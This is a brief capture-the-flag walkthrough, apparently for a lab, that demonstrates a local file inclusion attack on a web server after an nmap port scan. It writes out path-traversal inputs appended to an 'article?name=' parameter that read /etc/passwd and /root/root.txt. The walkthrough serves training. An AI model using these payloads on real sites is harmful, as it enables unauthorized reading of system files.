Use nmap to scan for open ports.

Head to the web server

Clicking on the LFI-attack page will showcase how to do LFI attack on a website

Add the following to the end of address article?name=../../../../../../etc/passwd and inspect source to get a better view,

Try it with article?name=../../../../../../root/root.txt to gain the final flag